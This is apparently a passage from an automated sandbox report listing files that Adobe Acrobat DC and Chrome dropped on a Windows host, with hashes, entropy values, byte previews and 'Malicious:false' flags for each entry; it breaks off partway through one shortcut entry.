                          SHA-512:B312716AED7B0A96FC423DDEFCB5B71519E18FBDF7C60D400CCE5C0F31C6B14982A8709EC88CF9876C3258C826D5C00AD172D4BE59F4F0B9E6CE3C9D4DEC406E
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):782
                          Entropy (8bit):5.371847277450035
                          Encrypted:false
                          SSDEEP:
                          MD5:64F59E1776B2721B9E970114B2BF0ED6
                          SHA1:600DFE6935AA22C61B88A23A3B6CA07E98EE9125
                          SHA-256:E078CDF94DA47639E73B0474E19A04A386771B4616A19096918E305B8BF19624
                          SHA-512:EA76D2AE1EA27EA4BBFC74E63E96A310DB4396F5D83BB93F00E0310AE00E177260480277095D0A415DC3A760AABB0DFC1431DD1522A7E095F506F2B47254C978
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1731424993121}}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):0.8112781244591328
                          Encrypted:false
                          SSDEEP:
                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                          Malicious:false
                          Reputation:unknown
                          Preview:....

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2817
                          Entropy (8bit):5.124869676956109
                          Encrypted:false
                          SSDEEP:
                          MD5:277206A125E9618B3E2C314BD2F41219
                          SHA1:D5733097B3C20F23AB562C4B2BD990F7F81AC0CB
                          SHA-256:957EED97973920F58A1EFCDF819F01BE557CF25F57F4543677447C7A160F9248
                          SHA-512:189F3E6FD4A1F4254A3311A4E9C45853AC9C193B06394E1B24C226766D8F58BA78ED674FEA398F98827387157A1B5B841A1928BDA20F08BCEC071E7CF663AD62
                          Malicious:false
                          Reputation:unknown
                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"09ef940832ec8407991bace8009f1e2e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1731424993000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"73bdf32eb9689025baabf6d838f740c6","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1731424992000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b670711806e7cefdebd6a237ed04816e","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1731424992000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"05c29b47cb63e7031f461e849e4628da","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1731424992000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"0ce0608f244fc2162884966f02e2e783","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1731424992000},{"id":"Edit_InApp_Aug2020","info":{"dg":"546bf2f8e1b31a142981f196ee214da7","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):0.9858853718212987
                          Encrypted:false
                          SSDEEP:
                          MD5:7D85DE94886AB88F1C392A5BF517E5CB
                          SHA1:38383474A6AF242DAE0C41D0E7B147A6013630CB
                          SHA-256:D7A2D597FD0B89570B4EF636F1076A4787F8AD5A13DE710F1E22087309108BDA
                          SHA-512:D58B30D855938E617206D3A0DA3E88F45140F14E45C37A6E1EA99A48FEDF6EE9928F7C805A3EC93A0A1261238E7601FBE58E86D19B27335032465A76435977A1
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):1.3422500505640889
                          Encrypted:false
                          SSDEEP:
                          MD5:D9FC50D307A20CACC73EDABD582FAD86
                          SHA1:2FD148521BB96335887B31F63AC2B2BC70AB46EA
                          SHA-256:EE9E93CDD1286A5B6B07756F4A63E7D2621710ED0829F9F1B343223E95D471CC
                          SHA-512:7CC7130937002FBE0923BCA6FB79FF290BEF665BBBB3C19B2F4AC1EADC285A865E370FAAE50DEBC52E46D319BDC25A8FD7FD9AAA86D0EFB3A17AF0B3D838C32D
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c.....<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):66726
                          Entropy (8bit):5.392739213842091
                          Encrypted:false
                          SSDEEP:
                          MD5:5DF3A1A00388E1C8D8557F9590C31C33
                          SHA1:B9EFB4DF7BDB54FA9D6F9008546D07EBE3EE6AB3
                          SHA-256:9126D0B0CBF0E67B6B7476148B5A240C744C2AB5877DF197084C52E83F503896
                          SHA-512:E7FDA4E05067690CA7953C7E50E6A66B28B24BC1E33E1E7178EA9483D26AC64B9FE03D19CA98A38CB9D602C1FC0DE2351B7F3C43D71B6E1F6D7E1A65BCCD162F
                          Malicious:false
                          Reputation:unknown
                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                          C:\Users\user\AppData\Local\Temp\MSI223d2.LOG

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):246
                          Entropy (8bit):3.488233466829981
                          Encrypted:false
                          SSDEEP:
                          MD5:3EF2A49D1B145213F033267BA846D3FF
                          SHA1:419CC346D6DDB27DF57E7AF6015F7AABE8512779
                          SHA-256:4C31CB1AA56C3EFA169C8B7E374FF792FDF95EA4AD1A417790C61631E8BFBAC7
                          SHA-512:721BC07F925BECB976B1458DE6A94F040C770E4ED47FA74527FAE5E35191F4FC54AA5FA54627B0EE5CC9714FF988B4385B23FFC85272A4EDFB8646BC1998FA29
                          Malicious:false
                          Reputation:unknown
                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.1./.2.0.2.4. . .1.0.:.2.3.:.1.3. .=.=.=.....

                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 10-23-08-807.log

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393)
                          Category:dropped
                          Size (bytes):16525
                          Entropy (8bit):5.353642815103214
                          Encrypted:false
                          SSDEEP:
                          MD5:91F06491552FC977E9E8AF47786EE7C1
                          SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                          SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                          SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:

                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29752
                          Entropy (8bit):5.414369540778172
                          Encrypted:false
                          SSDEEP:
                          MD5:AEA523391C44C3411B444DCFBC0E2446
                          SHA1:DB47F8D2664C98284B0A110AF0F6E421EDA8394D
                          SHA-256:6BC0113F86E30E2263D631D0DEE19EDEEAE5B0C11ED1F195E063BE1D45CB8CA3
                          SHA-512:DB9846F5B3B78C369F82A4AECCA6761E17CB520095A80773CEBD8913A778F661BEEDA93ECB0ABD4C9B72BC23FE512A2F36A5292671CD8C91394928E376CC191F
                          Malicious:false
                          Reputation:unknown
                          Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-

                          C:\Users\user\AppData\Local\Temp\acrocef_low\2b46ea1c-ba14-447b-9577-f672e1a03f5e.tmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                          Category:dropped
                          Size (bytes):1419751
                          Entropy (8bit):7.976496077007677
                          Encrypted:false
                          SSDEEP:
                          MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                          SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                          SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                          SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                          Malicious:false
                          Reputation:unknown
                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                          C:\Users\user\AppData\Local\Temp\acrocef_low\337b69a3-bbb5-4d61-a69f-9589a01be096.tmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                          Category:dropped
                          Size (bytes):758601
                          Entropy (8bit):7.98639316555857
                          Encrypted:false
                          SSDEEP:
                          MD5:3A49135134665364308390AC398006F1
                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                          Malicious:false
                          Reputation:unknown
                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                          C:\Users\user\AppData\Local\Temp\acrocef_low\5e61661a-79eb-4722-90f3-16784c1a10b6.tmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                          Category:dropped
                          Size (bytes):1407294
                          Entropy (8bit):7.97605879016224
                          Encrypted:false
                          SSDEEP:
                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                          Malicious:false
                          Reputation:unknown
                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                          C:\Users\user\AppData\Local\Temp\acrocef_low\ef23c1f5-0aa6-4dd8-aa2a-775408cee5b2.tmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                          Category:dropped
                          Size (bytes):386528
                          Entropy (8bit):7.9736851559892425
                          Encrypted:false
                          SSDEEP:
                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                          Malicious:false
                          Reputation:unknown
                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.986250622800496
                          Encrypted:false
                          SSDEEP:
                          MD5:8C2375593FE7544D6F2D16C2D9AA6C9A
                          SHA1:66E3CC7F4E98D6011D63A3C703C33B2B95468320
                          SHA-256:3DF968F594C862BEB0D4799B304AC5EB376ACC692F9A75B6269ECB56231A7293
                          SHA-512:DAE560146D3799A15910B8871C80D102C551086C68285A6F527C1520C544B84DC384049AC86C9BD16A0774B1A177B2D7A7613E3E6EEC1C3E9F684D3823F25B11
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......T..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):3.9998939018730915
                          Encrypted:false
                          SSDEEP:
                          MD5:EC7BCB759AA5698F0653B0245D9F75AA
                          SHA1:870E5A8B35EEB3C284D6E10CF59CBDB6400399CB
                          SHA-256:3EB0002DB5704B7287F879EE8A254F564AC272AC4F883C60B2F9C9C47993D715
                          SHA-512:6F5E4513B6116B3FB55D4467086F5E112235AC8600187037C7642B6E1D5AAB868DF29700F7AD9FEE96CB6D2551143E2113C0B1E2CC0D9883024941DF6B73A00E
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,..../.H..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2689
                          Entropy (8bit):4.008974666516378
                          Encrypted:false
                          SSDEEP:
                          MD5:E8FFC1012FE8BA91570AC3C638594F92
                          SHA1:069B4DE5F76BCC68710BCE4969366F2BABBBECDD
                          SHA-256:F91C2E5827C0CBA9292D082D5096E46B1AF10CD31D7F633C94A96D6DA74F9642
                          SHA-512:6E1928497F582A2A10F3111DB180B3D63B5A31930FD9953207AAD47AE2B68EDBBB0970786B7B581083336911F7902B74A8555530869058F6A08173A0BECE30F5
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
